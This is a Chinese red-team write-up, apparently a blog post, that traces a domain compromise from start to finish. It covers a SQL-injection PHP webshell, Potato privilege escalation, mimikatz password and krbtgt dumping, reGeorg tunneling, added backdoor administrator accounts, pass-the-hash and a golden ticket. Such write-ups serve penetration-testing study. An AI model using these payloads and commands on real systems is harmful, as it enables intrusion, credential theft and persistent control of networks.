也許有一天我們再相逢,睜大眼睛看清楚,我才是英雄。
本文首發于先知社區,原創作者即是本人
本篇文章目錄
網絡拓撲圖:
本次紅隊攻防實戰所需繪制的拓撲圖如下:
邊界突破
訪問網站:
http://xxx.xxx.xxx/?id=1
首頁如下:
SQL注入拿shell
構造payload:and 1=1顯示正確,and 1=2顯示錯誤,說明存在SQL注入,并且爆出絕對路徑
使用常用的注入函數into outfile 將一句話木馬寫入自動創建的 xxx.php文件中
http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'
需要有寫入權限和上一步爆出的絕對路徑
驗證上傳的木馬是否成功,成功寫入木馬
http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();
成功利用蟻劍拿到shell
內網信息收集
whoami
發現是普通用戶的權限
ipconfig /all
查看用戶的IP信息,可以看到位于工作組環境
route print
查看路由,通往10.0.1網段
net config Workstation
查看計算機名、全名、用戶名、系統版本、工作站
利用蟻劍傳入Potato提權工具,并使用其虛擬終端,查看權限,提權。
將超時時間調大:
上傳Potato提權工具成功,改名為xxx.exe
使用命令可以看到成功提權
xxx.exe -p “whoami”
將mimikatz改名為x.exe,成功上傳
然后在終端執行
xxx.exe -p "x.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt"
查看log.txt,成功抓到當前用戶和另一用戶的密碼
和
netstat -ano查看是否開啟3389端口,發現已開啟
查看防火墻是開啟的
netsh firewall show state
reGeorg內網穿透
使用軟件reGeorg實現攻擊機與目標機器的通信
通過蟻劍將reGeorge中的tunnel.php上傳至網站改名為tu.php
并成功訪問
http://xx.xx.xx/tu.php
啟動reGeorg
python3 xx.py -k xxx -u http://xx.xx.xx/tu.php
表示本地1080端口的流量都轉發給指定的那個url,1080是指定的監聽端口;
代理可以使用:
內網滲透
拿下邊界服務器
掛上代理遠程連接10.0.1.4
創建新賬號admin 并提權
xx.exe -p "net user xxx xxxx /add" //新增賬號和對應密碼
xx.exe -p "net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組
遠程連接
成功連接
將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼
成功抓到管理員賬戶密碼:
使用上述管理員賬號密碼,成功登陸服務器
通過nbtscan對當前C端進行掃描,發現還有三臺機器存活
拿下域內主機
根據我這個攻防時長兩年半的個人練習生的經驗來判斷,內網里的服務器的賬號密碼有部分可能是相同的。
再使用上述管理員賬號密碼遠程連接10.0.1.8
成功連接
whoami查看是administrator權限
ipconfig /all查看有域xx.xx
一般DNS服務器就是域控服務器
查詢域控主機名,遭拒絕,需利用官方工具將賬號提升至system權限再查
net user /domain
上傳官方工具PsExec.exe提權
PsExec.exe -i -s -d cmd 提升至system權限,獲取主機名DC.xx.xx
嘗試訪問域控主機C盤
dir \DC.xx.xx\c$
是拒絕的,需要工具minikatz,使用哈希傳遞
拿下域控
將mimikatz添加到桌面并以管理員權限運行
privilege::debug 提升權限
log 日志會記錄內容
sekurlsa::logonpasswords 抓取密碼
獲取
user=administrator
Domain=xxx
NTLM=xxxxxxx
將上述值放入下方命令中,完成哈希傳遞,以后利用這個CMD窗口運行,擁有管理員權限。
sekurlsa::pth /user:administrator /domain:"xx.xx"
/ntlm:xxxxxxx
啟動域控主機cmd窗口,成功訪問域控主機C盤
dir \DC.xx.xx\c$
使用官方工具PsExec.exe,命令如下:
PsExec.exe \dc.xx.xx cmd
進入c:
輸入ipconfig, 10.0.1.6為域控ip,此時成功獲取域控cmd
新建賬號,直接遠程登陸域控主機
"net user xxx xxxx /add" //新增賬號和對應密碼
"net localgroup administrators xxxx /add"//提升新增賬號的權限至administrators組
建好賬號后,直接登陸域控主機10.0.1.6(DC.xx.xx),成功拿下域控主機權限
至此已成功拿下三臺主機的權限。
權限維持
可通過制作黃金票據進行權限維持
因為域控主機10.0.1.6安裝了補丁KB2871997,所以無法抓取到明文密碼
管理員運行獼猴桃
log 日志記錄內容
lsadump::dcsync /user:krbtgt 獲取內容
獲取krbtgt賬號的關鍵值(OSID和Hash_NTLM)
制作黃金票據
kerberos::golden /admin:administrator /domain:xx.xx /sid:xx-xx-xx /krbtgt:xxxxxx /ticket:xxx.kiribi
如圖
票據加載成功
普通窗口無法訪問域控根目錄
把域控中的票據復制到在10.0.1.8主機中,使用獼猴桃加載票據
kerberos::ptt xxx.kiribi 加載票據
然后成功在普通cmd中訪問域控c盤內容
dir \DC.xx.xx\c$
PExec.exe \DC.xx.xx cmd 獲取域控cmd
網絡安全感悟
做網絡安全是一個長期的過程,因為做網絡安全沒有終點,不管是網絡安全企業,還是在網絡安全行業各種不同方向的從業人員,不管你選擇哪個方向,只有在這條路上堅持不懈,才能在這條路上走的更遠,走的更好,不然你肯定走不遠,遲早會轉行或者被淘汰,把時間全浪費掉。如果你覺得自己是真的熱愛網絡安全這個行業,堅持走下去就可以了,不用去管別人,現在就是一個大浪淘金的時代,淘下去的是沙子,留下來的才是金子,正所謂,千淘萬漉雖辛苦,吹盡狂沙始到金,網絡安全的路還很長,一生只做一件事,堅持做好一件事!
文筆生疏,措辭淺薄,望各位大佬不吝賜教,萬分感謝。
免責聲明:由于傳播或利用此文所提供的信息、技術或方法而造成的任何直接或間接的后果及損失,均由使用者本人負責, 文章作者不為此承擔任何責任。
轉載聲明:各家興 擁有對此文章的修改和解釋權,如欲轉載或傳播此文章,必須保證此文章的完整性,包括版權聲明等全部內容。未經作者允許,不得任意修改或者增減此文章的內容,不得以任何方式將其用于商業目的。
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog公眾號:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect博客:
https://rdyx0.github.io/先知社區:
https://xz.aliyun.com/u/37846SecIN:
https://www.sec-in.com/author/3097FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85